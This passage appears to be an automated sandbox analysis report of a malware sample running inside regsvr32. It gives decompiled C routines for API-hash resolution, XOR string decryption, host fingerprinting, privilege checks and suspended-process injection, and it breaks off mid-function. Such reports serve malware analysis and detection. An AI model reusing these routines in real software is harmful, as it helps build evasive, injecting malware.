              • Instruction Fuzzy Hash: F1314F76A0011AAFEB11DFA4DD49FDEB7BCAF04310F144166E505E3261D734EE149B94
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 179 73ef38-73ef4f 180 73ef51-73ef79 179->180 181 73efac 179->181 180->181 182 73ef7b-73ef9e call 73a5d0 call 73e34a 180->182 183 73efae-73efb2 181->183 188 73efb3-73efca 182->188 189 73efa0-73efaa 182->189 190 73f020-73f022 188->190 191 73efcc-73efd4 188->191 189->181 189->182 190->183 191->190 192 73efd6 191->192 193 73efd8-73efde 192->193 194 73efe0-73efe2 193->194 195 73efee-73efff 193->195 194->195 196 73efe4-73efec 194->196 197 73f001-73f002 195->197 198 73f004-73f010 LoadLibraryA 195->198 196->193 196->195 197->198 198->181 199 73f012-73f01c GetProcAddress 198->199 199->181 200 73f01e 199->200 200->183
              C-Code - Quality: 100%
              			E0073EF38(void* __ecx, intOrPtr __edx) {
              				signed int _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				char _v92;
              				intOrPtr _t41;
              				signed int _t47;
              				signed int _t49;
              				signed int _t51;
              				void* _t56;
              				struct HINSTANCE__* _t58;
              				_Unknown_base(*)()* _t59;
              				intOrPtr _t60;
              				void* _t62;
              				intOrPtr _t63;
              				void* _t69;
              				char _t70;
              				void* _t75;
              				CHAR* _t80;
              				void* _t82;
              
              				_t75 = __ecx;
              				_v12 = __edx;
              				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
              				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
              				if(_t41 == 0) {
              					L4:
              					return 0;
              				}
              				_t62 = _t41 + __ecx;
              				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
              				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
              				_t63 =  *((intOrPtr*)(_t62 + 0x18));
              				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
              				_t47 = 0;
              				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
              				_v8 = 0;
              				_v16 = _t63;
              				if(_t63 == 0) {
              					goto L4;
              				} else {
              					goto L2;
              				}
              				while(1) {
              					L2:
              					_t49 = E0073E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0073A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
              					_t51 = _v8;
              					if((_t49 ^ 0x218fe95b) == _v12) {
              						break;
              					}
              					_t73 = _v20;
              					_t47 = _t51 + 1;
              					_v8 = _t47;
              					if(_t47 < _v16) {
              						continue;
              					}
              					goto L4;
              				}
              				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
              				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
              				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
              					return _t80;
              				} else {
              					_t56 = 0;
              					while(1) {
              						_t70 = _t80[_t56];
              						if(_t70 == 0x2e || _t70 == 0) {
              							break;
              						}
              						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
              						_t56 = _t56 + 1;
              						if(_t56 < 0x40) {
              							continue;
              						}
              						break;
              					}
              					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
              					 *((char*)(_t82 + _t56 - 0x54)) = 0;
              					if( *((char*)(_t56 + _t80)) != 0) {
              						_t80 =  &(( &(_t80[1]))[_t56]);
              					}
              					_t40 =  &_v92; // 0x6c6c642e
              					_t58 = LoadLibraryA(_t40); // executed
              					if(_t58 == 0) {
              						goto L4;
              					}
              					_t59 = GetProcAddress(_t58, _t80);
              					if(_t59 == 0) {
              						goto L4;
              					}
              					return _t59;
              				}
              			}

              APIs
              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0073F008
              • GetProcAddress.KERNEL32(00000000,?), ref: 0073F014
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: .dll
              • API String ID: 2574300362-2738580789
              • Opcode ID: 92bfeae1058c1ac8a7003bc64a211f9e924712ac8a46e19f784e267b864bbde1
              • Instruction ID: b3af3ca84255038805a550b9ef5491fb5aebf167fb1118ba02100a861f2cafc6
              • Opcode Fuzzy Hash: 92bfeae1058c1ac8a7003bc64a211f9e924712ac8a46e19f784e267b864bbde1
              • Instruction Fuzzy Hash: B431E731A001169BEB64CF6DC880BAEBBF5AF44304F284469D845D7393E774DD41CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 221 73baf6-73bb1e CreateToolhelp32Snapshot 222 73bb20-73bb49 call 738f63 Process32First 221->222 223 73bb8e-73bb94 221->223 226 73bb4b-73bb57 222->226 227 73bb59-73bb69 call 73daf2 222->227 226->223 230 73bb6b-73bb7c 227->230 231 73bb7e-73bb8b FindCloseChangeNotification 227->231 230->227 230->231 231->223
              C-Code - Quality: 72%
              			E0073BAF6(void* __ecx, void* __edx) {
              				void* _v304;
              				char _v308;
              				intOrPtr _v312;
              				signed int _t16;
              				signed int _t17;
              				intOrPtr _t30;
              				void* _t33;
              				intOrPtr _t38;
              				void* _t43;
              				void* _t45;
              
              				_t33 = __edx;
              				_v304 = __ecx;
              				_t16 = CreateToolhelp32Snapshot(2, 0);
              				_t45 = _t16;
              				_t17 = _t16 | 0xffffffff;
              				if(_t45 != _t17) {
              					E00738F63( &_v304, 0, 0x128);
              					_v304 = 0x128;
              					if(Process32First(_t45,  &_v304) != 0) {
              						while(1) {
              							_t43 = _v312( &_v308, _t33);
              							if(_t43 == 0) {
              								break;
              							}
              							_t38 =  *0x74f8d0; // 0xc2f8c0
              							_push( &_v308);
              							_push(_t45);
              							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
              								continue;
              							}
              							break;
              						}
              						FindCloseChangeNotification(_t45);
              						_t17 = 0 | _t43 == 0x00000000;
              					} else {
              						_t30 =  *0x74f8d0; // 0xc2f8c0
              						 *((intOrPtr*)(_t30 + 0x30))(_t45);
              						_t17 = 0xfffffffe;
              					}
              				}
              				return _t17;
              			}














              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0073BB14
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • Process32First.KERNEL32(00000000,?), ref: 0073BB44
              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0073BB84
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
              • String ID:
              • API String ID: 3344077921-0
              • Opcode ID: 707fda3c821ec921b4845d07fbb07b2967ef1d44e31aa013a37796998028b02e
              • Instruction ID: 9b7f896e5f4b30e352686e5ce56106f1127f7c299b48f148e68abbf63bd1aef7
              • Opcode Fuzzy Hash: 707fda3c821ec921b4845d07fbb07b2967ef1d44e31aa013a37796998028b02e
              • Instruction Fuzzy Hash: 1211B6721042459BD310EF68EC49E6777ECFF85360F14062FF624CB195EB24D9048766
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 94%
              			E0073C778(WCHAR* __ecx, WCHAR* __edx) {
              				long _v8;
              				long _v12;
              				WCHAR* _v16;
              				short _v528;
              				short _v1040;
              				short _v1552;
              				intOrPtr _t23;
              				WCHAR* _t27;
              				signed int _t29;
              				void* _t33;
              				long _t38;
              				WCHAR* _t43;
              				WCHAR* _t56;
              
              				_t44 = __ecx;
              				_v8 = _v8 & 0x00000000;
              				_t43 = __edx;
              				_t56 = __ecx;
              				E00738F63(__edx, 0, 0x100);
              				_v12 = 0x100;
              				_t23 =  *0x74f8d0; // 0xc2f8c0
              				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
              				lstrcpynW(__edx,  &_v528, 0x100);
              				_t27 = E00739F85(_t44, 0x978);
              				_v16 = _t27;
              				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
              				asm("sbb eax, eax");
              				_v8 = _v8 &  ~_t29;
              				E00738D9A( &_v16);
              				_t33 = E0073A5E9(_t43);
              				E00739FE4( &(_t43[E0073A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
              				lstrcatW(_t43, _t56);
              				_t38 = E0073A5E9(_t43);
              				_v12 = _t38;
              				CharUpperBuffW(_t43, _t38);
              				return E0073E34A(_t43, E0073A5E9(_t43) + _t40, 0);
              			}

















              APIs
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • lstrcpynW.KERNEL32(?,?,00000100), ref: 0073C7BF
              • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0073C7F1
                • Part of subcall function 00739FE4: _vsnwprintf.MSVCRT ref: 0073A001
              • lstrcatW.KERNEL32(?,00000114), ref: 0073C82A
              • CharUpperBuffW.USER32(?,00000000), ref: 0073C83C
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
              • String ID:
              • API String ID: 455400327-0
              • Opcode ID: c07d1ffa96cb54610027f41df8ed5a78f6a0d547b4dcf915e8254867531a67d1
              • Instruction ID: a8fb4854b6b0d5762d4cf76e2c96a41782acc0f467e33662c19e418b9babedab
              • Opcode Fuzzy Hash: c07d1ffa96cb54610027f41df8ed5a78f6a0d547b4dcf915e8254867531a67d1
              • Instruction Fuzzy Hash: F02132B6A40214FFE710ABA4DC4EFEE77ACEB95310F104166F605D6182EB789E048B65
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 201 738bcd-738be2 202 738c05 201->202 203 738be4-738be7 201->203 205 738c0a-738c2a 202->205 204 738bee-738bfe 203->204 206 738c00-738c03 204->206 207 738c5d-738c5f 204->207 208 738c3a-738c3e 205->208 209 738c2c-738c31 205->209 206->202 206->204 207->202 210 738c61-738c65 call 738dc9 207->210 212 738c40-738c4a 208->212 213 738c4c-738c56 lstrlenW 208->213 209->209 211 738c33-738c38 209->211 216 738c6a-738c72 210->216 211->208 211->212 212->212 212->213 215 738c58-738c5c 213->215 217 738c74-738c79 216->217 218 738c7b-738c80 216->218 217->215 219 738c82-738c99 218->219 219->219 220 738c9b-738c9e 219->220 220->205
              C-Code - Quality: 80%
              			E00738BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				intOrPtr _v28;
              				short _v44;
              				void* _t38;
              				intOrPtr _t47;
              				void* _t53;
              				intOrPtr _t54;
              				intOrPtr _t55;
              				intOrPtr _t56;
              				void* _t58;
              				intOrPtr _t59;
              				void* _t62;
              				void* _t64;
              				signed int _t71;
              				signed int _t74;
              				void* _t76;
              				void* _t77;
              
              				_t71 = _a12;
              				_t53 = __edx;
              				_v8 = __ecx;
              				_t74 = _t71;
              				if(_t71 >= __edx) {
              					L4:
              					_t54 = 0x74f94e;
              					L5:
              					_t58 = 0;
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					asm("movsw");
              					asm("movsb");
              					asm("stosd");
              					asm("stosd");
              					asm("stosd");
              					asm("stosw");
              					asm("stosb");
              					_t38 = 0;
              					if(_v28 == 0) {
              						L8:
              						_t64 = _t38;
              						if(_t64 == 0) {
              							L10:
              							lstrlenW( &_v44);
              							return _t54;
              						} else {
              							goto L9;
              						}
              						do {
              							L9:
              							_t19 = _t58 + 0x30; // 0x30
              							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
              							_t58 = _t58 + 1;
              						} while (_t58 < _t64);
              						goto L10;
              					} else {
              						goto L6;
              					}
              					do {
              						L6:
              						_t38 = _t38 + 1;
              					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
              					_t64 = 0xe;
              					if(_t38 > _t64) {
              						goto L9;
              					}
              					goto L8;
              				}
              				_t59 = _a4;
              				_a12 = 0x5a;
              				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
              					_t74 = _t74 + 1;
              					if(_t74 < _t53) {
              						continue;
              					}
              					goto L4;
              				}
              				_t76 = _t74 - _t71;
              				if(_t76 == 0) {
              					goto L4;
              				}
              				_t47 = E00738DC9(_t76 + 1); // executed
              				_t55 = _t47;
              				_v12 = _t55;
              				if(_t55 != 0) {
              					_t56 = _a4;
              					_t62 = _t55 - _t71;
              					do {
              						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
              						_t71 = _t71 + 1;
              						_t76 = _t76 - 1;
              					} while (_t76 != 0);
              					_t54 = _v12;
              					goto L5;
              				}
              				return 0x74f94e;
              			}






















              APIs
              • lstrlenW.KERNEL32(?,00000138,?,0074CA88), ref: 00738C50
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: lstrlen
              • String ID: GetCurrentPath$Z
              • API String ID: 1659193697-4005238709
              • Opcode ID: 2d5faf18988bd5707e9438e1ab20ebeeba69098bf0279d5ce36f37ff7193efe0
              • Instruction ID: 36b16101d4ce673879c5db61d7f353241084d69ca622cdef7289bab3309a800f
              • Opcode Fuzzy Hash: 2d5faf18988bd5707e9438e1ab20ebeeba69098bf0279d5ce36f37ff7193efe0
              • Instruction Fuzzy Hash: E8213670B017456FEB45CF69C4800AEBB66BB9D310F2804B8F941A7203DA34DC4687B1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 234 73c986-73c9a6 GetTokenInformation 235 73c9a8-73c9b1 GetLastError 234->235 236 73c9ec 234->236 235->236 238 73c9b3-73c9c3 call 738dc9 235->238 237 73c9ee-73c9f2 236->237 241 73c9c5-73c9c7 238->241 242 73c9c9-73c9dc GetTokenInformation 238->242 241->237 242->236 243 73c9de-73c9ea call 738ddf 242->243 243->241
              C-Code - Quality: 86%
              			E0073C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
              				long _v8;
              				void* _v12;
              				void* _t12;
              				void* _t20;
              				void* _t22;
              				union _TOKEN_INFORMATION_CLASS _t28;
              				void* _t31;
              
              				_push(_t22);
              				_push(_t22);
              				_t31 = 0;
              				_t28 = __edx;
              				_t20 = _t22;
              				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
              					L6:
              					_t12 = _t31;
              				} else {
              					_t31 = E00738DC9(_v8);
              					_v12 = _t31;
              					if(_t31 != 0) {
              						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
              							goto L6;
              						} else {
              							E00738DDF( &_v12, _t16);
              							goto L3;
              						}
              					} else {
              						L3:
              						_t12 = 0;
              					}
              				}
              				return _t12;
              			}











              APIs
              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,00730000,00000000,00000000,?,0073CA07,00000000,00000000,?,0073CA30), ref: 0073C9A1
              • GetLastError.KERNEL32(?,0073CA07,00000000,00000000,?,0073CA30,00001644,?,0073E053), ref: 0073C9A8
                • Part of subcall function 00738DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0073CA07,00000000,00000000,?,0073CA30,00001644,?,0073E053), ref: 0073C9D7
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: InformationToken$AllocateErrorHeapLast
              • String ID:
              • API String ID: 2499131667-0
              • Opcode ID: 5fc616cc1eb613622fb4c85cc983eb43d032fcc8cc55e7b3263956542ebde2f8
              • Instruction ID: c9c568ed6f337295e7bc2e4d98d6166f9d45644fc4f769acca69095353cb9afe
              • Opcode Fuzzy Hash: 5fc616cc1eb613622fb4c85cc983eb43d032fcc8cc55e7b3263956542ebde2f8
              • Instruction Fuzzy Hash: 46012636700214FFAB216BA5DC49E9B3FACDF597A0B110026F401E6112EB38ED0087A0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 246 73ca5a-73ca79 call 73c92f 249 73cb14-73cb17 246->249 250 73ca7f-73ca96 call 73c986 246->250 253 73caf6-73cb04 FindCloseChangeNotification 250->253 254 73ca98-73cab9 250->254 255 73cb12 253->255 256 73cb06-73cb11 call 738ddf 253->256 254->253 260 73cabb-73cabd 254->260 255->249 256->255 261 73cae9-73caf4 260->261 262 73cabf-73cac2 260->262 261->253 263 73cac5-73cad4 262->263 266 73cae6-73cae8 263->266 267 73cad6-73cae2 263->267 266->261 267->263 268 73cae4 267->268 268->261
              C-Code - Quality: 48%
              			E0073CA5A(void* __ecx, void* __esi) {
              				intOrPtr* _v8;
              				char _v12;
              				void* _v16;
              				char _v20;
              				char _v24;
              				short _v28;
              				char _v32;
              				void* _t20;
              				intOrPtr* _t21;
              				intOrPtr _t29;
              				intOrPtr _t31;
              				intOrPtr* _t33;
              				intOrPtr _t34;
              				char _t37;
              				union _TOKEN_INFORMATION_CLASS _t44;
              				char _t45;
              				intOrPtr* _t48;
              
              				_t37 = 0;
              				_v28 = 0x500;
              				_t45 = 0;
              				_v32 = 0;
              				_t20 = E0073C92F(__ecx);
              				_v16 = _t20;
              				if(_t20 != 0) {
              					_push( &_v24);
              					_t44 = 2;
              					_t21 = E0073C986(_t44); // executed
              					_t48 = _t21;
              					_v20 = _t48;
              					if(_t48 == 0) {
              						L10:
              						FindCloseChangeNotification(_v16);
              						if(_t48 != 0) {
              							_t19 =  &_v20; // 0x73e075
              							E00738DDF(_t19, _t37);
              						}
              						return _t45;
              					}
              					_push( &_v12);
              					_push(0);
              					_push(0);
              					_push(0);
              					_push(0);
              					_push(0);
              					_push(0);
              					_push(0x220);
              					_push(0x20);
              					_push(2);
              					_push( &_v32);
              					_t29 =  *0x74f8d8; // 0xc2fab0
              					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
              						goto L10;
              					}
              					if( *_t48 <= 0) {
              						L9:
              						_t31 =  *0x74f8d8; // 0xc2fab0
              						 *((intOrPtr*)(_t31 + 0x10))(_v12);
              						_t37 = 0;
              						goto L10;
              					}
              					_t9 = _t48 + 4; // 0x4
              					_t33 = _t9;
              					_v8 = _t33;
              					while(1) {
              						_push(_v12);
              						_push( *_t33);
              						_t34 =  *0x74f8d8; // 0xc2fab0
              						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
              							break;
              						}
              						_t37 = _t37 + 1;
              						_t33 = _v8 + 8;
              						_v8 = _t33;
              						if(_t37 <  *_t48) {
              							continue;
              						}
              						goto L9;
              					}
              					_t45 = 1;
              					goto L9;
              				}
              				return _t20;
              			}





















              APIs
                • Part of subcall function 0073C92F: GetCurrentThread.KERNEL32 ref: 0073C942
                • Part of subcall function 0073C92F: OpenThreadToken.ADVAPI32(00000000,?,?,0073CA74,00000000,00730000), ref: 0073C949
                • Part of subcall function 0073C92F: GetLastError.KERNEL32(?,?,0073CA74,00000000,00730000), ref: 0073C950
                • Part of subcall function 0073C92F: OpenProcessToken.ADVAPI32(00000000,?,?,0073CA74,00000000,00730000), ref: 0073C975
                • Part of subcall function 0073C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,00730000,00000000,00000000,?,0073CA07,00000000,00000000,?,0073CA30), ref: 0073C9A1
                • Part of subcall function 0073C986: GetLastError.KERNEL32(?,0073CA07,00000000,00000000,?,0073CA30,00001644,?,0073E053), ref: 0073C9A8
              • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,00730000), ref: 0073CAFE
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
              • String ID: us
              • API String ID: 1806447117-795443346
              • Opcode ID: 0d28a9fba1f1b7fc45930ceec3429892633f87e576b4482103fdb4fa195cffbb
              • Instruction ID: 076ac3baec868d389245ec8b8c80f0d13dc59321347e21721d7af84ab10130e5
              • Opcode Fuzzy Hash: 0d28a9fba1f1b7fc45930ceec3429892633f87e576b4482103fdb4fa195cffbb
              • Instruction Fuzzy Hash: 3A215072A00209AFEB11DFA9DC85EAEB7F8EF48700F10806AE551FB152E7349D418B54
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 269 73be10-73be5f call 738f63 * 2 CreateProcessW
              C-Code - Quality: 79%
              			E0073BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
              				struct _STARTUPINFOW _v72;
              				signed int _t11;
              
              				E00738F63(__edx, 0, 0x10);
              				E00738F63( &_v72, 0, 0x44);
              				_v72.cb = 0x44;
              				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
              				asm("sbb eax, eax");
              				return  ~( ~_t11) - 1;
              			}






              APIs
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0073BE52
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: CreateProcessmemset
              • String ID: D
              • API String ID: 2296119082-2746444292
              • Opcode ID: c71214e4591e0bfc08dd22a044866697d497a16fb553f21185c8524e7c1ae155
              • Instruction ID: a52989227868d4b58a603fca76141f516c7bae0fbd3b511fa4bb7798e7ec6160
              • Opcode Fuzzy Hash: c71214e4591e0bfc08dd22a044866697d497a16fb553f21185c8524e7c1ae155
              • Instruction Fuzzy Hash: FAF030F16402087EF620E665DC0AFBF36ACDB81710F500125BA05EB1D1EAB4AD0582A5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 274 73d889-73d8a9 call 73d7cd 277 73d9da-73d9dd 274->277 278 73d8af-73d8ce call 73b6e3 274->278 281 73d8d4-73d8d6 278->281 282 73d9ca-73d9d9 call 738ddf 278->282 283 73d9b8-73d9c8 call 738ddf 281->283 284 73d8dc-73d8de 281->284 282->277 283->282 286 73d8e1-73d8e3 284->286 289 73d9a6-73d9b2 286->289 290 73d8e9-73d908 call 738f63 call 73be10 286->290 289->281 289->283 296 73d96a-73d96e 290->296 297 73d90a-73d91d call 73d9de 290->297 298 73d970-73d972 296->298 299 73d999-73d9a0 296->299 297->296 304 73d91f-73d937 297->304 301 73d983-73d993 298->301 302 73d974-73d97a 298->302 299->286 299->289 301->299 302->301 307 73d967 304->307 308 73d939-73d94e GetLastError call 73dadc 304->308 307->296 311 73d963-73d964 FindCloseChangeNotification 308->311 312 73d950-73d95b 308->312 311->307 314 73d95e 312->314 315 73d95d 312->315 314->311 315->314
              C-Code - Quality: 96%
              			E0073D889(intOrPtr __edx) {
              				intOrPtr _v8;
              				signed int _v12;
              				signed int _v16;
              				intOrPtr _v20;
              				char _v24;
              				intOrPtr _v36;
              				char _v40;
              				char _v80;
              				char _t37;
              				intOrPtr _t38;
              				signed int _t45;
              				void* _t49;
              				intOrPtr _t50;
              				intOrPtr _t52;
              				intOrPtr _t54;
              				void* _t56;
              				intOrPtr _t59;
              				void* _t62;
              				intOrPtr _t63;
              				signed int _t67;
              				intOrPtr _t69;
              				void* _t70;
              				intOrPtr _t86;
              				char _t87;
              				void* _t88;
              
              				_v16 = _v16 & 0x00000000;
              				_v20 = __edx;
              				_t86 = 0;
              				_t37 = E0073D7CD( &_v16, __edx);
              				_t87 = _t37;
              				_v24 = _t87;
              				_t89 = _t87;
              				if(_t87 == 0) {
              					return _t37;
              				}
              				_t38 =  *0x74f8d4; // 0xc2fc00
              				_t7 = _t38 + 0xac; // 0xafbcc48
              				E0073B6E3( &_v80,  *_t7 + 7, _t89);
              				_v12 = _v12 & 0;
              				_t67 = _v16;
              				if(_t67 == 0) {
              					L21:
              					E00738DDF( &_v24, 0);
              					return _t86;
              				}
              				while(_t86 == 0) {
              					_t69 = 0;
              					_v8 = 0;
              					while(_t86 == 0) {
              						E00738F63( &_v40, _t86, 0x10);
              						_t88 = _t88 + 0xc;
              						_t49 = E0073BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
              						_t94 = _t49;
              						if(_t49 >= 0) {
              							_t56 = E0073D9DE(E00736297,  &_v40, _t94, _v20); // executed
              							if(_t56 != 0) {
              								_t59 =  *0x74f8d0; // 0xc2f8c0
              								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
              								if(_t70 != 0) {
              									GetLastError();
              									_t62 = E0073DADC( &_v40);
              									_t63 =  *0x74f8d0; // 0xc2f8c0
              									if(_t62 != 0) {
              										_push(0xea60);
              										_push(_t70);
              										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
              											_t86 = _t86 + 1;
              										}
              										_t63 =  *0x74f8d0; // 0xc2f8c0
              									}
              									FindCloseChangeNotification(_t70);
              								}
              								_t69 = _v8;
              							}
              						}
              						if(_v40 != 0) {
              							if(_t86 == 0) {
              								_t54 =  *0x74f8d0; // 0xc2f8c0
              								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
              							}
              							_t50 =  *0x74f8d0; // 0xc2f8c0
              							 *((intOrPtr*)(_t50 + 0x30))(_v36);
              							_t52 =  *0x74f8d0; // 0xc2f8c0
              							 *((intOrPtr*)(_t52 + 0x30))(_v40);
              						}
              						_t69 = _t69 + 1;
              						_v8 = _t69;
              						if(_t69 < 2) {
              							continue;
              						} else {
              							break;
              						}
              					}
              					_t67 = _v16;
              					_t45 = _v12 + 1;
              					_v12 = _t45;
              					if(_t45 < _t67) {
              						continue;
              					} else {
              						break;
              					}
              					do {
              						goto L20;
              					} while (_t67 != 0);
              					goto L21;
              				}
              				L20:
              				E00738DDF(_t87, 0xfffffffe);
              				_t87 = _t87 + 4;
              				_t67 = _t67 - 1;
              			}





























              APIs
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
                • Part of subcall function 0073BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0073BE52
                • Part of subcall function 0073D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0073DA40
                • Part of subcall function 0073D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0073DA89
                • Part of subcall function 0073D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0073DAA6
                • Part of subcall function 0073D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0073DAC7
              • GetLastError.KERNEL32(?,?,00000001), ref: 0073D939
                • Part of subcall function 0073DADC: ResumeThread.KERNELBASE(?,0073D947,?,?,00000001), ref: 0073DAE4
              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0073D964
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
              • String ID:
              • API String ID: 2212882986-0
              • Opcode ID: e2081d1ab074184df09ae1815021b89875131d686b2d487580c2e720072420c2
              • Instruction ID: d5bf7d176a2f5065d55002226f943210d9ab35105f5e6b90538b46aa8b4ab6df
              • Opcode Fuzzy Hash: e2081d1ab074184df09ae1815021b89875131d686b2d487580c2e720072420c2
              • Instruction Fuzzy Hash: 34416576A00205EFEB20DFA5E989BDEB7F9FF48310F144065E515A7252DB38AD04CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 61%
              			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
              				long _v8;
              				intOrPtr _t15;
              				WCHAR* _t23;
              				long _t24;
              				void* _t28;
              				void* _t31;
              				intOrPtr _t36;
